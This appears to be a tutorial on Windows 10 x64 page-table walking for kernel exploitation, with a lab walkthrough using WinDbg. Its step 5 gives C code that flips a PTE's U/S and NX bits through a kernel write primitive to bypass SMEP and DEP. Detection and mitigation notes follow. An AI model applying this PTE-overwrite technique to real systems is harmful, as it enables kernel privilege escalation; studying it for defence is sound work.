Skip to content

Memory paging fundamentals for kernel exploitation (Win10 x64)

How a 48-bit virtual address is walked through PML4 → PDPT → PD → PT to a physical frame on Windows 10 x64, where the PTE for any address lives, and which PTE control bits (U/S, R/W, NX, P) a kernel write primitive flips to defeat SMEP/NX.

Mechanism

Why it works

x86-64 in long mode uses 4-level paging. Translation starts at the physical address in CR3 (the PML4 base) and walks four 512-entry tables, consuming 9 address bits at each level, then a 12-bit page offset:

Bits Field Table walked
63–48 sign extension (canonical)
47–39 PML4 index PML4
38–30 PDPT index PDPT (PDPE)
29–21 PD index PD (PDE)
20–12 PT index PT (PTE)
11–0 page offset 4 KB frame

Each table is one 4 KB page of 512 × 8-byte entries (9 bits = 512). Bit 47 decides the canonical sign extension: user addresses are 0..., kernel addresses are F.... A Page Frame Number (PFN) stored in an entry is just a physical page number — the physical base is PFN * 0x1000. The final PTE's PFN, times 0x1000, plus the 12-bit offset, is the physical address.

The exploitation-relevant trick: because the page tables are themselves pages in physical memory, the OS maps them back into virtual memory through a self-reference. On Windows 10 x64 the PTE array is mapped at a known base, historically 0xFFFFF68000000000 and, after page-table randomization (a Win10 mitigation), at a randomized base such as 0xFFFFFE0000000000. Given that base, the PTE that controls a virtual address VA is found by indexing into that array by VA's page number:

PTE_addr = PTE_BASE + ((VA >> 12) << 3)
         = PTE_BASE + ((VA >> 9) & 0x7FFFFFFFF8)

Each PTE carries control bits that the MMU enforces on every access:

  • P (Present, bit 0) — entry is valid; cleared ⇒ page fault.
  • R/W (bit 1) — writable when set, read-only when clear.
  • U/S (bit 2)User when set, Supervisor (kernel) when clear.
  • A (Accessed)/D (Dirty) — set by the CPU on reference/write.
  • NX (bit 63) — No-eXecute when set (DEP / NonPagedPoolNx).

These three bits are what kernel exploits target. SMEP forbids ring-0 from executing a page whose PTE has U/S = User; SMAP forbids ring-0 data access to such pages. So an attacker with a kernel write primitive who can locate the PTE of their user-mode shellcode page can clear the U/S bit (User → Supervisor) and clear NX. The page keeps its user-mode address, but the MMU now treats it as a kernel, executable page — SMEP/NX no longer fire, because from the CPU's view it is a supervisor page. This is the core of "PTE overwrite" SMEP/DEP bypasses.

Walkthrough

Authorized testing only

Use a Windows 10 x64 VM with a kernel debugger you own. Page-table base and PFNs are randomized per boot; numbers below are illustrative of one session.

1. Attach WinDbg and find a target virtual address. Pick a user-mode page you control (e.g., a VirtualAlloc'd shellcode buffer at VA).

2. Walk the tables with !pte. !pte <VA> prints all four entries and the final frame, with control bits:

kd> !pte 0x1f0000
                VA 00000000001f0000
PXE at FFFFFE7F3F9FCF00    PPE at FFFFFE7F3F9E0000    PDE at FFFFFE7F3C000000    PTE at FFFFFE0000000F80
contains ...          contains ...          contains ...          contains 0090000012345867
                                                                   pfn 12345 ---DA--UWEV

The trailing flag string (---DA--UWEV) decodes the bits. Here U = User, W = Writable, E = (not) eXecute-disabled per the level's encoding, V = Valid (Present). The PTE at ... address is the kernel virtual address of the 8-byte PTE that governs VA.

3. Convert virtual → physical manually. Confirm the walk with !vtop using the CR3 base, and dump the frame with !dd:

kd> !vtop @cr3 0x1f0000     ; resolve VA using current CR3
kd> !dd <physical_base>     ; dump the physical page contents

4. Compute the PTE address yourself. This is what an exploit does without a debugger — derive the controlling PTE from the randomized base:

// PTE_BASE leaked/known for this boot (randomized on Win10).
unsigned long long pte_of(unsigned long long va, unsigned long long pte_base) {
    return pte_base + ((va >> 12) * 8);   // (VA>>12) page number, *8 bytes/PTE
}

5. Flip the bits with a write primitive. Read the current PTE, clear U/S (make it Supervisor) and clear NX (make it executable), write it back:

unsigned long long pte = kread64(pte_of(va, pte_base));
pte &= ~(1ULL << 2);    // U/S: User(1) -> Supervisor(0)  => SMEP/SMAP see kernel page
pte &= ~(1ULL << 63);   // NX -> 0  => page becomes executable (defeat DEP/NX)
pte |=  (1ULL << 1);    // R/W set, if a writable shellcode page is desired
kwrite64(pte_of(va, pte_base), pte);
// invalidate the stale TLB entry for va (e.g., re-access / context switch)

The user-address shellcode at va is now a kernel-executable page; redirecting kernel control flow to va no longer faults under SMEP/DEP.

Detection

  • PatchGuard does not monitor arbitrary user PTEs, so a single U/S flip is largely invisible at runtime; detection is easier at the primitive level (an exploitable kernel write).
  • On hardened systems, HVCI / Kernel CFG / SMEP+SMAP raise the bar so a single PTE flip is no longer sufficient on its own.

Mitigation

  • SMEP / SMAP (hardware) — make U/S-tagged pages unusable from ring 0 unless the attacker explicitly flips the bit, which is the whole point of patching them; defense-in-depth must therefore protect the write primitive.
  • Page-table randomization (Win10) — randomizes PTE_BASE, so the attacker must first leak it before computing PTE addresses.
  • HVCI (Hypervisor-protected Code Integrity) — uses second-level address translation (EPT) so the guest cannot make an arbitrary page kernel-executable even after flipping a guest PTE.
  • Keep NonPagedPoolNx / DEP enforced so kernel data pages are non-executable by default.

References